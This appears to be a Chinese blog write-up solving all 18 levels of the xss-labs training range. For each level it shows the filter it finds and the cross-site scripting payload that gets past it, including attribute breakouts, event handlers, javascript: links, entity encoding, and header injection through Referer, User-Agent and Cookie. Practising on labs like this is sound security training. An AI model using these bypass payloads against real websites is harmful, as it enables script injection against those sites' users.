xss-labs靶场通关

已于 2024-08-28 23:40:13 修改
阅读量132 收藏 1
点赞数 5
文章标签: xss 前端 javascript
于 2024-08-23 20:25:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73771249/article/details/141470734
版权

第一关

输入js语句<script>alert(1)</script>

第二关

1、输入js语句<script>alert(1)</script>,发现没有完成跳转

 2、查看源代码,发现被"包括在内,闭合两边"

3、输入 "><script>alert(1)</script><"

第三关

1、输入js语句<script>alert(1)</script>尝试

2、查看源代码,大小于号和双引号被转义,但是单引号没有被转义且参数是用单引号闭合的,尝试用事件触发的形式

输入' οnfοcus='alert(1)'尝试,成功绕过,但并无显示。直接点击输入框

第四关

1、输入js语句<script>alert(1)</script>尝试

 2、查看源代码,大小于号(尖括号)已被过滤,引号没有被过滤或转义,参数采用的是双引号的闭合方式,尝试用事件触发的形式

 3、使用点击js代码输入尝试      " οnfοcus='alert(123)'

第五关

1、尝试输入<script>alert(1)</script>查看

2、查看源代码,发现script和on开头的两个关键字都被转义,大小于号和引号没有被过滤与转义。同时语句采用双引号闭合方式 

3、输入"><a href="javascript:alert(1)">click me!</a><"尝试

第六关

1、输入js语句尝试<script>alert(1)</script>

  2、查看源代码,发现一些标签被过滤

 3、使用大小写尝试绕过"><Script>alert(1)</Script><"

第七关

1、输入js语句尝试<script>alert(1)</script>

 2、查看源代码,发现script被过滤

 3、使用复写尝试绕过" oonnmouseover="alert(1)

 

第八关

1、输入js语句尝试<script>alert(1)</script>,页面没有变化

2、查看源代码,发现script被过滤,'被过滤

3、尝试使用href的伪协议    javascript:alert(1),因为script会被添加下划线,对script编码进行尝试

java&#115;&#99;&#114;&#105;&#112;&#116:alert(1)

第九关

1、输入js语句尝试<script>alert(1)</script>,页面没有变化

 2、查看源代码,发现与第九关过滤差不多,尝试用第九关代码尝试

解决参数不合法的问题。由于输入参数会赋给href,属于一个链接,因此猜测是否输入参数需要含http://才合法。输入参数为http://xxx.xxx并提交,查看源码发现现在链接是合法的

 3、输入javascript:alert('http://')       java&#115;&#99;&#114;&#105;&#112;&#116alert('http://')

第十关

 1、输入js语句尝试<script>alert(1)</script>,页面没有变化

 2、查看源代码发现大小于号被转义、双引号都被转义

 构造xss漏洞验证代码并验证。我们修改参数为?t_sort=click me!" type="button" onmouseover="alert(/xss/)

第十一关

1、输入js语句尝试<script>alert(1)</script>,页面没有变化

2、查看源代码,发现这有一个ref的变量可能是数据包里的referer ,

一共接收了三个参数,keyword与t_sort,被进行了html实体化的处理,所以尝试referer注入

 

 3、使用BP抓包进行referer注入   referer:click me!" type="button" οnmοuseοver="alert(1)

 

第十二关

1、查看源代码,查看过滤规则,发现读取了user-agent的信息,因此,可以直接判定这里很可能存在着注入点

 

2、使用BP抓包,需修改ua头进行注入

第十三关

1、查看源代码,现这里的cookie确实是存在着一个变量user,尝试cookie头注入

2、使用BP抓包,,修改cookie头

click me!" type="button" οnmοuseοver="alert(1)

第十四关

1、打开页面发现是上传图片,上传一张图片查看

2、修改EXIF信息,向其中写入脚本,上传这张图片就是处罚xss

第十五关

1、查看源代码,发现注入点ng

2、输入<script>alert(1)</script>

3、输入?src='level1.php?name=<a type="text" href="javascript:alert(1)">',点击图片就会跳转到16关

第十六关

1、输入<img src=yuan οnerrοr=alert(1)>'查看页面源代码,发现空格进行了替换

 

2、查看源代码 ,发现空格确实被替换,使用以下%0a来代替空格字符 进行rul的编码绕过

keyword=<img%0asrc=yuan%0aοnerrοr=alert(1)>

 

第十七关

1、这一关主要考查的是Flash XSS。 因此这里,我们利用其特性与闭合回路的思想进行xss注入

level17.php?arg01=a&arg02=" οnmοuseοver=alert(1)

第十八关

1、与17关原理相同

level18.php?arg01=a&arg02=" οnmοuseοver=alert(1)

清星QA
关注
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
XSS-labs靶场通关
weixin_70292186的博客
05-08 1059
首先说一下embed标签,可以理解为定义了一个区域,可以把html文档、图片、视频、音频等内容内嵌到当前页面,这关浏览器不支持flash插件,所以图片显示不出来,如果感觉别扭,就在后端把。里面的链接失效了,这关跳过,不过提一句,这关涉及到了exif漏洞,原理是有些网站有读取图片exif信息的功能,当网站读取到的恶意的exif信息就会触发属性中的。发现有的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合。的,所以加个type="text"
xss-labs靶场通关详解
shw_yzh的博客
08-23 754
xss-labs靶场通关详解
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 2012
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
xss-labs靶场全关通关
m0_64849639的博客
09-04 967
alert('111')</script><script>
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 2850
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5602
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS漏洞-05】XSS-labs靶场通关大挑战
m0_64378913的博客
05-31 2924
目录1 实验简介2 XSS通关过程2.0 通关前注意2.1 关卡12.2 关卡22.3 关卡32.4 关卡42.5 关卡52.6 关卡62.7 关卡72.8 关卡82.9 关卡92.10 关卡102.11 关卡112.12 关卡122.13 关卡133 总结 1 实验简介 实验网站/靶场:http://test.ctf8.com/。 实验目的: 熟悉XSS漏洞测试的过程; 判断是否过滤与过滤规则; 练习XSS语句构造与绕过方法; 一边练习一边结合SQL注入进行比较; 一边练习一边思考编码与转码,后续补充这
xss-labs靶场通关
m0_52051132的博客
10-15 1672
在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
Pikachu-Cross-Site Scripting-xss盲打
guanrongl的专栏
10-03 254
xss盲打,不是一种漏洞类型,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
PIKACHU | PIKACHU 靶场 XSS 后台配置
Blue17 の 小窝
09-30 829
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。
XSS(内含DVWA)
m0_73902453的博客
09-27 857
反射型 XSS:即时反射,依赖用户点击链接,通常是一次性的。存储型 XSS:恶意代码存储在服务器上,多次执行,影响广泛。DOM型 XSS:常在客户端,通过操控 DOM 元素来执行,无需与服务器交互。
Pikachu-xss防范措施 - href输出 & js输出
guanrongl的专栏
10-03 339
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
最新发布
HEX9CF的技术博客
10-04 290
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
Pikachu-Cross-Site Scripting-反射型xss(get)
guanrongl的专栏
10-02 487
存储型XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类型的XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
XSS基础
2302_81328699的博客
10-01 319
【代码】XSS基础
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值